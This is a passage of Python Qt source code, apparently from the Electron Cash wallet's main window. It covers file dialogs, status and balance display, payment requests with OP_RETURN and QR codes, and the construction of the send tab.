# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1)) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
extra = run_hook("balance_label_extra", self)
if isinstance(extra, str) and extra:
text += " [{}]".format(extra)
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text += " " + ( _("[%d unverified TXs]") % n_unverif )
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
self.status_button.setStatusTip( status_tip )
self.update_cashshuffle_icon()
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr, *, parent=None):
parent = parent or self
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.gui_object.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_opreturn_e, 2, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 2, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
label = QLabel(_('Requested &amount'))
label.setBuddy(self.receive_amount_e)
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_amount_e, 3, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 3, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 4, 0)
grid.addWidget(self.expires_combo, 4, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 4, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(self, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 5, 2, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
slf = weakSelf()
if slf:
slf.check_and_reset_receive_address_if_needed()
w = ReceiveTab()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# create a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
else:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin Cash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin Cash address)') + ".\n\n" \
+ _('You may also enter cointext:(NUMBER) to send a CoinText.')
payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3, 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('&Amount'), msg)
amount_label.setBuddy(self.amount_e)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
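# 'dyn' indicates the slider is in dynamic-fee mode: persist the slider position as 'fee_level';
# otherwise persist the selected static rate as 'fee_per_kb'.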
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 6, 0)
grid.addWidget(self.fee_slider, 6, 1)
grid.addWidget(self.fee_custom_lbl, 6, 1)
grid.addWidget(self.fee_e, 6, 2)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.cointext_button = EnterButton(_("Coin&Text"), self.do_cointext)
self.cointext_button.setToolTip(_('Process CoinText, transforming it into a BIP70 payment request.'))
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addWidget(self.cointext_button)
grid.addLayout(buttons, 7, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide cointext button, etc
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
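# Any manual edit to the amount cancels 'Max' mode; the button stays enabled only while
# the amount field is empty and editable.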
self.max_button.setChecked(False)
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
